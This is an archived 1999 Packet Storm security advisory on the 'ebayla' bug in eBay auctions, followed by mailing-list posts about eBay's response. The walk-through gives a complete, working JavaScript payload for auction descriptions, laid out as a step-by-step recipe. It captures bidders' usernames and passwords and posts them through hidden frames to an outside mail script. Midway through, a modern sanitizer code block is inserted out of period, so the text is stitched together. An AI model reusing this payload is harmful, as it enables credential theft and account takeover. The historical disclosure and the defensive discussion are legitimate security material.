Packet Storm (packetstormsecurity.com) - PACKETSTORM:12004
ebayla.txt - Aug 17, 1999
http://www.because-we-can.com/ebayla/
  
THE EBAYLA BUG AND HOW TO PROTECT YOURSELF  
  
This page describes a security problem that Blue Adept  
<http://www.because-we-can.com/>  
discovered with eBay's <http://www.ebay.com/>   
on-line auctions on March 31,  
1999 (realaudio interview).   
<http://stream.internet.com/Content/inr19990412.ram>  
The security hole allows eBay  
users to easily steal the passwords of other eBay users.  
The exploit involves posting items for bid that include  
malicious javascript code as part of the item's description.  
When an unsuspecting eBay user places a bid on the
item, the embedded javascript code sends their username
and password to the malicious user by e-mail. From the
victim's point of view, nothing unusual seems to have
occurred, so they are unlikely to report/complain to eBay.
  
Once a malicious user knows the username/password of the
victim's eBay account, she can assume full control
of the account, including the ability to:

create new auctions (automatically charging the victim's account),
place bids in the victim's name,
retract legitimate bids in the victim's name,
change the victim's username/password, barring them from eBay,
associate bogus negative/positive comments with an arbitrary seller,
prematurely close an auction being run by the victim,
insert the ebayla code into the victim's auction.
(The code could be altered to do this automatically, which would
constitute an ebayla virus).
  
The security problem is dangerously easy to take advantage of. A  
malicious user needs only to embed the javascript code into their  
description of an item for auction. A walk-through of the exploit  
demonstrates step-by-step how any user can steal eBay passwords. [1]  
  
Blue Adept notified eBay that a 'huge' potential security problem
existed on March 31, 1999 and offered assistance (but as of April 18,
1999 has only received form letter KMM798062C0KM in reply).
Information about the ebayla exploit is being made publicly available to
speed the process of fixing the security hole.
  
TRY THE EBAYLA BUG DEMO ON YOURSELF!  
  
Visit a working demonstration of this exploit at eBay! The demo
works with any javascript-enabled browser, such as Netscape or
Internet Explorer. Users must register (free) with eBay to place bids.
<http://pages.ebay.com/aw/registration-show.html>  
  
The demo is Blue Adept's own auction infected with eBayla code.  
<http://cgi.ebay.com/aw-cgi/eBayISAPI.dll?ViewItem&item=92085423>   
WARNING! When you bid on this item (or even just review your bid   
without placing it), your username and password will automatically   
be mailed back to because-we-can.com.  
  
  
  
  
HOW TO PROTECT YOURSELF  
  
Unfortunately, the potential security issues at eBay are difficult
to spot and avoid. If you are not used to spotting suspect
javascript in the source of an html document, the best way to
protect yourself may be to avoid using eBay until adequate html
filters have been implemented.
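The "adequate html filters" this section waits for come down to an allowlist on seller-supplied description markup. The following is an added example, not Blue Adept's or eBay's code: a small allowlist sanitizer that keeps the harmless markup of the demo listing (the <hr>, an http link) and removes what the ebayla payload depends on (the <script> element with its body, on* handlers, javascript: URLs, and the <body>/<form>/<frameset> tags). The tag allowlist, the sample listing and the recipient@example.invalid address are constructed for this demo.

```javascript
// Added example: allowlist filter for seller-supplied item descriptions.
// Tag/attribute allowlist and the sample listing below are constructed for this demo.
const ALLOWED_TAGS = new Set(["a", "b", "i", "u", "p", "br", "hr", "ul", "ol", "li"]);
const ALLOWED_ATTRS = { a: new Set(["href", "title"]) };
// script/style are removed with their bodies; an unterminated <script> is cut to end of input.
const DROP_BODY = /<(script|style)\b[^>]*>[\s\S]*?(?:<\/\1\s*>|$)/gi;
const TAG = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
const ATTR = /([a-zA-Z][a-zA-Z0-9-]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

function escapeText(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

function rebuildTag(name, attrText) {
  const allowed = ALLOWED_ATTRS[name] || new Set();
  const kept = [];
  ATTR.lastIndex = 0;
  for (let m; (m = ATTR.exec(attrText)) !== null; ) {
    const key = m[1].toLowerCase();
    if (!allowed.has(key)) continue;                  // onload=, onmouseover=, style=, ... never pass
    const raw = (m[2] ?? m[3] ?? m[4] ?? "").trim();
    if (key === "href" && !/^https?:\/\//i.test(raw)) continue;   // javascript: and other schemes dropped
    kept.push(` ${key}="${escapeText(raw)}"`);
  }
  return `<${name}${kept.join("")}>`;
}

function sanitizeDescription(html) {
  const stripped = html.replace(DROP_BODY, "");     // pass 1: script/style elements gone
  let out = "", last = 0;
  TAG.lastIndex = 0;
  for (let m; (m = TAG.exec(stripped)) !== null; ) {   // pass 2: rebuild allowlisted tags only
    out += escapeText(stripped.slice(last, m.index));  // everything between tags is plain text
    last = m.index + m[0].length;
    const name = m[2].toLowerCase();
    if (!ALLOWED_TAGS.has(name)) continue;            // <body>, <form>, <input>, <frameset>: dropped
    out += m[1] === "/" ? `</${name}>` : rebuildTag(name, m[3]);
  }
  return out + escapeText(stripped.slice(last));
}

// Constructed listing in the shape of the ebayla demo, not the original auction text.
const SAMPLE_LISTING =
  '1 car, comes with windows. crashes frequently. toy.<hr>\n' +
  'Demo of the <a href="http://www.because-we-can.com/ebayla/default.htm" onmouseover="alert(1)">ebayla bug</a>.\n' +
  '<a href="javascript:ebayla()">bid</a>\n' +
  '<script>recipient = "recipient@example.invalid";\n' +
  "document.writeln('</scr' + 'ipt>');\n</script>\n<body onLoad=document.form1.submit()>";

console.log(sanitizeDescription(SAMPLE_LISTING));
```

The regex tokenizer is enough to show the allowlist idea; a production filter should sit on a real HTML parser so that malformed markup cannot make the filter and the browser disagree about where a tag starts.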
  
-----------------------------------------------------------------------------  
  
[1] http://www.because-we-can.com/ebayla/walk.htm  
  
THE EBAYLA BUG WALK-THROUGH  
  
This page demonstrates how the ebayla bug can be exploited by someone with minimal resources to steal
usernames and passwords from eBay users. The resources required to launch the attack are minimal and freely
available. The following exploit is written to work with Netscape Communicator only. The goal is to demonstrate
that using only the items listed below, a malicious user can acquire eBay usernames and passwords. (To see a
more efficient (2 line) version of the code that uses a Perl script, visit the live demo at eBay.)
  
INGREDIENTS:   
  
1 Computer with Internet Access   
1 email account   
  
STEP 1:  
Visit ebay.com and register for a free user account.   
<http://pages.ebay.com/aw/registration-show.html>  
  
STEP 2:  
Go to the seller's area to post an item for auction. When asked to enter the description of the item, post the
following description, containing the ebayla code. The first line of the script indicates the email address to which
usernames/passwords are to be sent.
<http://pages.ebay.com/aw/newitem.html>
  
1 car, comes with windows. crashes frequently. toy.<hr>  
  
WARNING do not bid on this item!! This auction is a demonstration of the   
<a href="http://www.because-we-can.com/ebayla/default.htm">ebayla bug</a>.   
If you place/review a bid, your username and password will be mailed to   
http://www.because-we-can.com.  
  
  
<script>  
recipient = "[email protected]";  
  
function printframeset(place_bid, mailUrl, username, password){  
document.open();   
document.writeln('<script>');  
document.writeln('function go(){');  
document.writeln('top.b.document.open();');  
document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');  
document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');  
document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');  
document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');  
document.writeln('top.b.document.writeln("</form>")');  
document.writeln('top.b.document.close();');  
document.writeln('}');  
document.writeln('</scr' + 'ipt>');  
document.writeln('</head>');  
document.writeln('<frameset rows="100%,*" onLoad="go()">');  
document.writeln('<frame name="t" src="' + place_bid + '">');  
document.writeln('<frame name="b" src="">');  
document.writeln('</frameset>');  
document.close();  
}  
  
function urlEncode(inStr) {  
outStr=' '; //not '' for a NS bug!  
for (i=0; i < inStr.length; i++) {  
aChar=inStr.substring (i, i+1);  
switch(aChar){  
case '%': outStr += "%25"; break; case ',': outStr += "%2C"; break;  
case '/': outStr += "%2F"; break; case ':': outStr += "%3A"; break;  
case '~': outStr += "%7E"; break; case '!': outStr += "%21"; break;  
case '"': outStr += "%22"; break; case '#': outStr += "%23"; break;  
case '$': outStr += "%24"; break; case "'": outStr += "%27"; break;  
case '`': outStr += "%60"; break; case '^': outStr += "%5E"; break;  
case '&': outStr += "%26"; break; case '(': outStr += "%28"; break;  
case ')': outStr += "%29"; break; case '+': outStr += "%2B"; break;  
case '{': outStr += "%7B"; break; case '|': outStr += "%7C"; break;  
case '}': outStr += "%7D"; break; case ';': outStr += "%3B"; break;  
case '<': outStr += "%3C"; break; case '=': outStr += "%3D"; break;  
case '>': outStr += "%3E"; break; case '?': outStr += "%3F"; break;  
case '[': outStr += "%5B"; break; case '\\': outStr += "%5C"; break;  
case ']': outStr += "%5D"; break; case ' ': outStr += "+"; break;  
default: outStr += aChar;  
}  
}  
return outStr.substring(1, outStr.length);  
}  
  
function newaction(){  
window.document.forms[0].action="javascript:ebayla()";  
}  
  
function ebayla(){  
item = urlEncode(window.document.forms[0].item.value);  
username = urlEncode(window.document.forms[0].userid.value);  
password = urlEncode(window.document.forms[0].pass.value);  
maxbid = urlEncode(window.document.forms[0].maxbid.value);  
  
bid_script = "http://cgi.ebay.com/aw-cgi/eBayISAPI.dll";  
bid_query_string = "?MfcISAPICommand=MakeBid&item=" + item + "&userid=" + username  
+ "&pass=" + password + "&maxbid=" + maxbid;  
place_bid = bid_script + bid_query_string;  
  
mailscript = "http://204.225.88.132/cgi-bin/form1";  
mailUrl = mailscript + '?|' + recipient;  
printframeset(place_bid, mailUrl, username, password);  
}  
  
if(document.links[11] != "http://pages.ebay.com/aw/account-status.html"){  
setTimeout("newaction()", 1000);  
}  
  
</script>  
  
  
STEP 4: Wait for users to place/review bids on the item. Shortly afterwards, you will receive an e-mail message  
that contains the user's username and password.  
  
Note:
In the exploit described above, the part of the program that does the
actual "dirty work" of mailing the password and username is a
randomly chosen server-side mailing script we found on the web.
There are many equivalent and publicly available server-side mailing
programs that can be used in its place.
<http://www.altavista.com/cgi-bin/query?pg=aq&kl=XX&r=%22feedback+form%22+%7C+%22mail+form%22&search=Search&q=&d0=&d1=>  
  
-----------------------------------------------------------------------------  
  
Date: Mon, 19 Apr 1999 14:11:50 -0700  
From: "Epstein, Jeremy" <[email protected]>
Subject: Another old-fashioned bug comes back to byte  
  
Wired reports in "'EBayla' Bug Strikes eBay" (see  
http://www.wired.com/news/news/technology/story/19207.html) that eBay users  
can enter an HTML description of the item being auctioned. However, the  
script provided by the seller can also include Javascript, thus allowing the  
seller to create a fairly simple web page that, when accessed by the  
unsuspecting bidder, can capture the bidder's eBay username and password and  
send it to the bidder (or anyone else).  
  
This is a new version of an old bug: if you allow users to specify input  
that can be used by others, make sure there's enough filtering that it can't  
be harmful.  
  
Perhaps the scariest part was the reaction from eBay, as reported by Wired:  
"EBay's senior director of corporate communications characterized the hole  
as an 'occasional byproduct' of the service's user-focused design." eBay  
downplayed the severity of the exploit, noting that "If somebody had indeed  
used your password as well as your username and started bidding on a bunch  
of items, you'd be the first person to be contacted by eBay through e-mail,  
and we'd be able to backtrack on that to make sure that we could take care  
of that situation."   
  
Gee thanks. After it happens, you'll let me know I just bought a velvet  
Elvis and a set of matching pink lawn flamingos :-)  
  
-----------------------------------------------------------------------------  
  
Date: Wed, 21 Apr 1999 17:45:47 -0700  
From: Paul Festa <[email protected]>  
To: [email protected]  
Subject: Re: eBay password stealing with JavaScript  
  
They say they won't:  
  
http://www.news.com/News/Item/0,4,35321,00.html  
  
>>>eBay acknowledged that the JavaScript exploit works, but minimized its  
importance.  
  
"We know it's there, but you have to put it all in perspective," said eBay  
spokesman Kevin Pursglove. "We have a very open environment that lets  
individuals describe what they're selling, and JavaScript is there so  
people can make the best of their abilities to describe an item."<<<  
  
  
  
  
At 08:30 PM 4/20/99 -0600, Michael K. Sanders wrote:  
>Since 'e-commerce' was discussed recently and I didn't find this in  
>the archives, may I direct your attention to:  
>  
><URL:http://because-we-can.com/ebayla/default.htm>  
>  
>It will be interesting if eBay tries to 'filter' JavaScript from their  
>listings to fix this.  
>  
>  
Paul Festa  
reporter, CNET News.com  
(415) 395-7805 ext. 1313  
  
www.news.com  
"Silicon Valley's leading source of up-to-the-minute  
information about the technology business." --New York Times  
  
www.cnet.com  
"A thing called CNET, which is an industry thing." --Bill Gates  
  